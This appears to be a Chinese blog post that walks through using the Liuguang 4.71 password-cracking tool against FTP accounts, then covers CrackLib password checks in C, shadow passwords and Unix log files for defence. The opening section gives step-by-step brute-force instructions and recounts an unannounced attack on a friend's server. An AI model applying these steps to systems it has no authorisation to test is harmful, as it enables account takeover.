流光4.71的使用方法,这里有使用说明可以下载自己看一下:http://www.yeshack.com/jc/200508/2345.html 工具这种东西本身就是一把双刃剑,如果因为自己的站点密码太过简单而被攻破然后归罪于因特网上一些免费或共享软件的话,恐怕是有些目光短浅了 。管辖的系统存在漏洞而不自知的话,就算没被人‘干掉',也只是一种暂时的‘虚假安全'。 一、小榕流光使用的简单说明 要谈流光还真找不着感觉——在小榕的帮助文件里已经把软件的使用方法详尽无比地描述过了(强烈建议使用者使用前将帮助文件多读两遍)——我就说三个方面吧——高手完全可以略过的...... 1、 对某FTP主机一次完整的在线安全检测过程 A、选定主机:右键单击FTP主机选项,从弹出菜单中选择添加——将目标的IP地址填入,如"210.142.192.13"...... B、选定用户:右键单击该IP地址,可选添加(将想测试的用户名逐个加入)添加方案(可在方案中编辑希望测试的用户名列表)从列表添加(直接从字典文件中导入)及从SMTP主机导入(导入SMTP主机探测到的用户名),假设你想探测的用户名为quack,便直接在"添加"中填入quack。 C、选择字典: a、简单模式探测:在选项菜单条中对字典及简单模式设置做适当修正以适应本次测试要求,当然你也可以在面板上的单词小写、简单后缀等按钮直接选定。 b、标准模式探测:在"解码字典或方案"中选定某一字典(方案)。 D、调整设置:检查选项菜单栏中的系统设置、连接选项和探测选项,将本次测试的各种选项调整至最优。 E、开始探测:在"探测"菜单中选定"简单模式"或"标准模式",开始此次安全检测。 F、注意事项:由于流光的系统占用较高,最好不要再开其它应用程序;在在线检测时可能有时会出现假死机现象,这时你可以通过观察MODEM的RD与SD灯来判断程序是否正常运作。 2、密码字典的选用:在线探测相当耗时,所以一个合适的字典会大大降低你的"检测成本",流光里的工具菜单栏对生成适合自己使用的字典档是一个相当实用的工具——我个人觉得尤其值得使用的是"方案编辑工具",它能够在你锁定特定用户检测时发挥较大的作用,具体使用帮助文件中写得非常详细,我就不再多说了 ——当然流光里附带的XKEY也是一个相当不错的字典生成程序。 3、流光其实不仅仅是一个在线安全检测工具——而是一个"工具包",同时具有以下几个辅助功能 A、探测主机端口 B、探测主机类型 C、FINGER D、扫描POP3、FTP主机 E、验证主机用户 而其主要功能是对POP3、FTP、HTTP、PROXY主机进行在线密码安全检测。所以——一句话,功能强大,试过便知。 至于同样原理的在线密码破解软件国内流行的也并不少,如很早以前的emailcrack、wwwhack、网络刺客1 以及现在流传很广网络刺客2、Webcrack、Xavior等等,流光在很大程度上集成了这些软件的功能,但这些软件早期的产品也都缺乏IP隐藏或类似功能,而近期的Webcrack以及Xavior则都具备从代理服务器端进行探测的功能,我认为这应该是在线探测的一个方向——安全第一嘛——基于此想法,我对流光在探测中会留下的记录进行试验:对一位网管朋友的WINDOWS2000 Beta3 SERVER 英文版进行了一番测试,对其上已知的帐号进行密码强攻, 经探测得知其FTP端口是开放的,在未预先通知的情况下对其进行攻击,事后打电话询问其记录情况,在EVENT VIEWER里有如下信息:WARNING:The server was unable to logon the Windows NT account 'houxiourong' due to the following error: Logon failure: unknown user name or bad password.The data is the error code. 而甚至他告诉我,当我的攻击进行到一半时,他的主机上就弹出了The System log file is full.的信息提示框——失败的登陆次数太多以至于其默认为512K的记录文件被撑饱了!所以我要奉劝某些心怀叵测的人们——别做坏事...... 二、密码设置的基本常识及工具 1、有关口令的一些统计 A、数目:在UNIX系统里可以建立多于43,000,000,000,000,000个不同的口令,但如果仅仅组合10种主要 语言的字典,加上这些字的反向、大写、简单后缀等一些微小变形,仅能产生不到5,000,000个字......加 上一些俚语......也不会超出这个数量级。 B、国外某机构在对一个无约束环境的用户口令选择的调查中显示,只有1.4%的用户口令中含有控制符。 2、介绍几个工具 A、CrackLib 简介及应用举例 by JeffreyDong CrackLib 是什么? CrackLib: A ProActive Password Sanity Library By: Alec Muffett Address: alecm@crypto.dircon.co.uk CrackLib是一个可用于类UNIX系统下的函数库, 一般来说, 通常只使用其中的一个函数. :-) 它可以用于编写和passwd有关的程序中, 其基本思想是很简单的, 就是防止用户使 用过于简单, 容易被猜测出来或容易被一些工具搜索到的密码. 密码攻击是网络上最为常见的攻击手段. 随着国内计算机用户水平的提高, 有很多人学 会了使用工具搜索密码的方法, 由于某些原因, 含有被加密密码的文件会被某些用户获 取; 这时, 过于简单的密码就会成为攻击者的突破口. 网上有很多这方面的报道.(我的 一个朋友告诉我他曾用一个星期的时间算出了BTA一个管理员的密码. wow! :-P) 通过限 制用户使用不安全的密码, 可以提高你的系统的安全性. CrackLib的特点 CrackLib并不是一个可以直接运行使用的程序, 它是一个函数库, 你可以利用其中的函 数写自己的程序,或是加入其它程序中, 用来提高安全性. 比如, 你可以重写passwd, 使用户在选择密码时受到限制. CrackLib使用一个字典, 它查找字典以判断所选用密码是否是不安全的密码, 所以你也可 以加入其它信息, 使用自己的字典.比如, 加入公司的名称, 实验室墙上的单词等等潜在 的不安全密码. CrackLib的使用非常简单, 它可以被应用于很多地方, 只需加入简单的几行源码, 就可以 得到非常好的效果. CrackLib的安装 CrackLib可以很容易的在Internet上找到, 我现在使用的版本是2.7, 跑在我的i586/RedHat Linux和i386/Slackware Linux上. 如果你无法找到它的话, 赶紧去补一补如何在Internet 上查找特定的软件吧, 因为这是一项非常重要的基本功. CrackLib好象没有什么文档, 这也是GNU急需加强的地方. 但是它的安装非常简单, 只要按照 README文件 中所叙述的就可以了.如果你用的distribution中包含了这个包, 那它说不定已经 安装在你的机器上了,如RedHat 5.1等. :-) 需要注意的是, 不同版本中一些文件所处的目录位置不同, 你要先确定它们所处的位置. 比 如, 在RedHat 5.1中, 字典是在/usr/lib/中, 文件名为cracklib_dict.*, 而不是README中 所举例的/usr/local/lib/pw_dict.* 应用举例 这里我举一个很简单的例子, 试图用很短的篇幅来说明用法. char *FascistCheck(char *pw, char *dictpath); 这是CrackLib中最常用的函数. pw是用户选择的密码, 你要去验证它是不是不安全的. dictpath是字典所在路径, 注意, 要把文件名中"."之前的部分加上.以RedHat 5.1为例, 假设你已正确的安装了CrackLib 2.7和FireBird BBS 2.66M. 让我们来 看看如何把CrackLib加入BBS中去. :-) 首先, 改写bbs_src目录下的register.c: /* ----------- begin ---------- */ char *msg; /* ----------- end ---------- */ ...... while( 1 ) { getdata(0,0,"请设定您的密码 (Setup Password): ",passbuf,PASSLEN,NOECHO,YEA) ; if( strlen( passbuf ) < 4 || !strcmp( passbuf, newuser.userid ) ) { prints("密码太短或与使用者代号相同, 请重新输入\n") ; continue; } /* ----------- begin ---------- */ if (msg = (char*) FascistCheck(passbuf, CRACKLIBPATH)) { printf("请另选密码! (%s)\n",msg); continue; } /* ----------- end ---------- */ strncpy( newuser.passwd, passbuf, PASSLEN ); getdata(0,0,"请再输入一次你的密码 (Reconfirm Password): ",passbuf,PASSLEN,NOECHO,YEA); if( strncmp( passbuf, newuser.passwd, PASSLEN ) != 0 ) { prints("密码输入错误, 请重新输入密码.\n") ; continue; } passbuf[8] = '\0' ; strncpy( newuser.passwd, genpasswd( passbuf ), PASSLEN ); break; } begin和end注释所夹部分为改动处, 下同. 接着改写bbs_src目录下的userinfo.c: /* ----------- begin ---------- */ char *msg; /* ----------- end ---------- */ ...... getdata(i++,0,"请设定新密码: ",buf,PASSLEN,NOECHO,YEA); if( buf[0] == '\0' ) { prints("\n\n密码设定取消, 继续使用旧密码\n"); fail++; break; } strncpy(genbuf,buf,PASSLEN) ; /* ----------- begin ---------- */ if (msg = (char*) FascistCheck(buf, CRACKLIBPATH)) { printf("\n请另选密码! (%s)\n", msg); prints("\n密码设定取消, 继续使用旧密码\n"); fail++; break; } /* ----------- end ---------- */ getdata(i++,0,"请重新输入新密码: ",buf,PASSLEN,NOECHO,YEA); if(strncmp(buf,genbuf,PASSLEN)) { prints("\n\n新密码确认失败, 无法设定新密码。\n"); fail++; break; } 接着在bbs.h中加入: #ifndef CRACKLIBPATH #define CRACKLIBPATH "/usr/lib/cracklib_dict" #endif 注意这里是字典所处的位置. 最后改动bbs的Makefile: OS_DEF = -DLINUX -DTERMIOS CC = gcc CFLAGS = -O2 /* ----------- begin ---------- */ LIBS = -ltermcap -lbsd -lcrack /* ----------- end ---------- */ 然后make, make install就可以了. :-) 很简单, 不是吗? 注意:本段关于cracklib的说明载于[网络工作室] B、Proactive Checking 这个程序能在输入口令时进行一系列的口令检查,这会对避免不安全口令出现于你的系统有帮助作用。它与一般的shadow和NIS(也就是yellow page)口令系统共同工作。 C、Shadow 这个程序取代了原来系统的口令保护机制,它将/etc/passwd文件中的口令信息移到文件/etc/shadow中,还有一些如口令到期机制、允许16字符口令等功能。 D、Passwd+ 这是一个典型的增强型口令系统。 三、应有的措施及其基本知识 1、日志文件 大多数日志文件都是由系统一行接着一行写入的文本文件。比如sulog会记录用户使用su命 令试图进入系统的情况,在sulog文件尾部附加一条信息,以记录su命令是否被成功使用。不同版本的UNIX系统存放日志文件的目录不同,常见目录如下:/usr/adm 早期的UNIX系统/var/adm 较新版本的UNIX系统/var/log 用于Solaris\Linux\BSD等系统中在这些目录或其子目录下,你可以找到下列文件acct 或 pacct 记录每个用户使用过的命令aculog 拨出"猫"的记录lastlog 记录用户最后一次成功登陆时间及最后一次失败登陆时间loginlog 不良登陆记录messages 输出到主控台及由syslog系统服务程序产生的消息sulog su的使用情况 utmp 记录当前登陆的每个有户 utmpx 扩展的utmp wtmp 记录每一次用户登陆和注销的历史信息及系统开关信息 wtmpx 扩展wtmp vold.log 使用外部介质产生的错误 xferlog FTP存取情况 2、定期运行如crack之类的口令破解程序以检查系统中是否存在弱帐户。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值